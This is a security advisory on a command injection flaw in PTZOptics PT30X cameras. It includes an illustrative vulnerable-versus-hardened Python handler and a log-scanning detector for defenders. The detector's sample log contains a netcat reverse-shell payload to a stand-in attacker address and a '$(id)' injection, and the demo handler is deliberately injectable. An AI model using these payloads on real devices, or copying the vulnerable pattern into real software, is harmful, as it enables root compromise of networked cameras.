CVE-2024-8957 — PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability

CVE-2024-8957

PTZOptics PT30X Cameras — Admin-Auth OS Command Injection; Second Half of Chain with CVE-2024-8956 Auth Bypass

What are PTZOptics PT30X Cameras?

PTZOptics PT30X-SDI and PT30X-NDI are pan-tilt-zoom (PTZ) cameras used in broadcast studios, corporate conference rooms, houses of worship, and live streaming productions for professional video capture. These cameras expose a web management interface and CGI API for remote control — adjusting pan/tilt/zoom, configuring network settings, and updating firmware. Like many IoT cameras, they run an embedded Linux OS with a privileged web server, and their management interfaces are frequently exposed to the network or internet for remote operation.

Overview

CVE-2024-8957 is an OS command injection vulnerability in the CGI interface of the PTZOptics PT30X-SDI and PT30X-NDI cameras. An authenticated attacker with admin privileges can inject OS commands through the ntp_addr parameter of the /cgi-bin/param.cgi endpoint. On its own it rates High (CVSS 7.2) because admin credentials are required; combined with CVE-2024-8956 (an authentication bypass in the same cameras, reported as an IDOR flaw), the chain yields unauthenticated root-level command execution: CVE-2024-8956 opens the admin interface without credentials, and CVE-2024-8957 then runs arbitrary commands as root. Both were discovered by Nozomi Networks and were added to the CISA KEV catalog on the same day in November 2024.

Affected Versions

Device                 Vulnerable           Fixed
PTZOptics PT30X-SDI    firmware < 6.3.40    6.3.40
PTZOptics PT30X-NDI    firmware < 6.3.40    6.3.40

Technical Details

CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The CGI script /cgi-bin/param.cgi accepts an ntp_addr parameter that sets the camera's NTP server address. The value is placed into a shell command line (presumably for an NTP configuration utility) without being validated or escaped, so any shell metacharacters it contains are interpreted by the shell rather than treated as part of the address. An attacker with admin access can therefore submit a value such as "8.8.8.8; malicious_command" and the camera executes malicious_command in addition to the intended NTP command. Because the camera's web server runs as root, the injected command runs as root as well.

When chained with CVE-2024-8956:

  1. CVE-2024-8956 — Bypasses authentication via an IDOR flaw, granting access to the admin CGI interface without credentials.
  2. CVE-2024-8957 — Injects OS commands through the ntp_addr parameter, executing as root.

The result is unauthenticated root RCE on any network-accessible camera running vulnerable firmware.
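The bug class behind the chain's second step, shown as an added example. This is not PTZOptics' code: the camera's param.cgi is a compiled binary whose source is not public, so the handler below is a hypothetical reconstruction of the pattern. "echo" stands in for whatever NTP utility the firmware invokes, and the "sync-to" argument, the function names and the payload are invented for the demonstration. The vulnerable handler splices ntp_addr into a shell string (the Python equivalent of system() in C); the hardened one validates the value against an allow-list of IP literals and RFC 1123 hostnames and then executes without a shell, with the value as a single argv element.

```python
"""Hypothetical reconstruction of the CWE-78 bug class behind CVE-2024-8957.

Not PTZOptics' code. "echo" stands in for the NTP utility the firmware
invokes; the "sync-to" argument and the function names are invented.
"""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs

NTP_TOOL = "echo"  # stand-in; on the camera this would be the real NTP client


def get_ntp_addr(query_string: str) -> str:
    """Extract ntp_addr the way a CGI would, percent-decoding included."""
    return parse_qs(query_string).get("ntp_addr", [""])[0]


def run_ntp_sync_vulnerable(query_string: str) -> str:
    """Vulnerable pattern: the parameter is spliced into a shell command line.

    shell=True is the Python equivalent of system() in C. A value of
    "8.8.8.8; echo INJECTED" makes the shell run a second command; on the
    camera that second command inherits the web server's root privileges.
    """
    cmd = f"{NTP_TOOL} sync-to {get_ntp_addr(query_string)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list for what an NTP server address may look like: an IP literal or an
# RFC 1123 hostname. No metacharacters, and no leading "-" that a downstream
# tool could parse as a command-line option.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_valid_ntp_host(value: str) -> bool:
    """True only for an IPv4/IPv6 literal or a well-formed hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def run_ntp_sync_hardened(query_string: str) -> str:
    """Hardened pattern: allow-list the value, then exec without a shell."""
    ntp_addr = get_ntp_addr(query_string)
    if not is_valid_ntp_host(ntp_addr):
        return "ERROR: invalid ntp_addr"
    # argv list, no shell: the value reaches the tool as one argument and is
    # never parsed for ; | $() or similar, even if validation were weaker.
    return subprocess.run([NTP_TOOL, "sync-to", ntp_addr],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed payload in the shape the text describes, URL-encoded as it
    # would travel in the request ("%3B" is ";", "%20" is a space).
    payload = "ntp_addr=8.8.8.8%3B%20echo%20INJECTED"
    print("vulnerable:", run_ntp_sync_vulnerable(payload))
    print("hardened:", run_ntp_sync_hardened(payload))
    print("hardened, benign:", run_ntp_sync_hardened("ntp_addr=pool.ntp.org"))
```

Run stand-alone, the vulnerable handler prints two lines (the intended "sync-to 8.8.8.8" and then "INJECTED"), while the hardened handler rejects the same payload and still accepts a normal hostname. Note that escaping alone (shlex.quote) would stop the shell injection but not a value such as "-n" being read as an option by the NTP tool; the allow-list handles both.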

Discovery

Discovered by Nozomi Networks' research team and disclosed alongside CVE-2024-8956 as a two-vulnerability chain.

Exploitation Context

PTZ cameras in corporate and broadcast environments are network-connected and are often reachable remotely for AV production support, which makes them readily attackable targets. Compromised IoT cameras have been recruited into botnets, used for network reconnaissance, and kept as persistence footholds on corporate networks. Root access on a camera gives an attacker a persistent presence on a device that traditional EDR tooling does not cover.
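A retrospective check a defender can run while the firmware update is rolled out, added here as an example and not taken from PTZOptics or Nozomi: scan HTTP access logs for requests to /cgi-bin/param.cgi whose ntp_addr value carries shell metacharacters, and for any param.cgi access from outside the subnet that is supposed to manage the cameras. The camera's own log format is not documented on this page, so the lines are in Common Log Format as a reverse proxy or network sensor in front of the camera would record them; the sample lines, the addresses and the management subnet 10.0.5.0/24 are all constructed for the example.

```python
"""Added detection example for CVE-2024-8957-style requests in access logs.

Constructed for this page. Assumes Common Log Format as written by a proxy
or sensor in front of the camera; the management subnet is an assumption.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed management subnet; in practice this comes from the asset inventory.
MGMT_NETS = [ipaddress.ip_network("10.0.5.0/24")]

# Constructed sample lines. Addresses, timestamps and payloads are invented;
# the third line is the "8.8.8.8;<command>" shape the text describes,
# URL-encoded as it would appear on the wire.
SAMPLE_LOG = """\
10.0.5.7 - - [06/Nov/2024:09:12:01 +0000] "GET /cgi-bin/param.cgi?ntp_addr=pool.ntp.org HTTP/1.1" 200 17
10.0.5.7 - - [06/Nov/2024:09:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048
198.51.100.23 - - [06/Nov/2024:09:15:09 +0000] "GET /cgi-bin/param.cgi?ntp_addr=8.8.8.8%3B%20nc%20198.51.100.23%204444%20-e%20%2Fbin%2Fsh HTTP/1.1" 200 17
198.51.100.23 - - [06/Nov/2024:09:15:10 +0000] "POST /cgi-bin/param.cgi HTTP/1.1" 200 17
10.0.5.7 - - [06/Nov/2024:09:20:00 +0000] "GET /cgi-bin/param.cgi?ntp_addr=%24(id) HTTP/1.1" 200 17
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Characters that let a value escape a shell word: command separators,
# pipes, command substitution, redirection, newlines.
SHELL_META = re.compile(r"[;|&`$<>(){}\n\r]")


def scan_access_log(text: str) -> list:
    """Return one finding per suspicious /cgi-bin/param.cgi request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/cgi-bin/param.cgi":
            continue
        src = ipaddress.ip_address(m["src"])
        reasons = []
        if not any(src in net for net in MGMT_NETS):
            reasons.append("param.cgi reached from outside the management subnet")
            if m["method"] == "POST":
                # Access logs do not record POST bodies, so an injected
                # ntp_addr sent that way is invisible here; use a packet capture.
                reasons.append("POST body not in access log; inspect packet capture")
        # parse_qs percent-decodes, so %3B is seen as ';' just as the CGI sees it.
        for value in parse_qs(url.query).get("ntp_addr", []):
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacters in ntp_addr: {value!r}")
        if reasons:
            findings.append({"src": m["src"], "ts": m["ts"],
                             "status": m["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ts"], f["src"], f["status"], "; ".join(f["reasons"]))
```

On the sample log this reports three requests: the external GET carrying a reverse-shell payload in ntp_addr, the external POST (flagged because its body cannot be inspected from the log), and an internal GET with "$(id)" in ntp_addr. The benign internal request setting pool.ntp.org is not reported. A 200 status on a flagged request is not proof of success, so treat findings as leads to confirm against a capture or the device itself.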

Remediation

  1. Update PTZOptics PT30X-SDI and PT30X-NDI cameras to firmware 6.3.40 or later.
  2. Restrict camera management interface access to authorized network segments — cameras should not have their web management interfaces exposed to the internet.
  3. Place IoT/AV devices on a dedicated VLAN isolated from business-critical systems.
  4. See also CVE-2024-8956 (authentication bypass) — both vulnerabilities are fixed by the same firmware update.

Key Details

Property               Value
CVE ID                 CVE-2024-8957
Vendor / Product       PTZOptics — PT30X-SDI/NDI Cameras
NVD Published          2024-09-17
NVD Last Modified      2025-10-27
CVSS 3.1 Score         7.2
CVSS 3.1 Vector        CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Severity               HIGH
CWE                    CWE-78
CISA KEV Added         2024-11-04
CISA KEV Deadline      2024-11-25
Known Ransomware Use   No

CVSS 3.1 Breakdown

Attack Vector:        Network
Attack Complexity:    Low
Privileges Required:  High
User Interaction:     None
Scope:                Unchanged
Confidentiality:      High
Integrity:            High
Availability:         High

Required Action

CISA BOD 22-01 Deadline: 2024-11-25. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
2024-09-17   CVE published; PTZOptics releases firmware 6.3.40 fixing both CVE-2024-8956 and CVE-2024-8957
2024-11-04   Added to CISA Known Exploited Vulnerabilities catalog alongside CVE-2024-8956
2024-11-25   CISA BOD 22-01 remediation deadline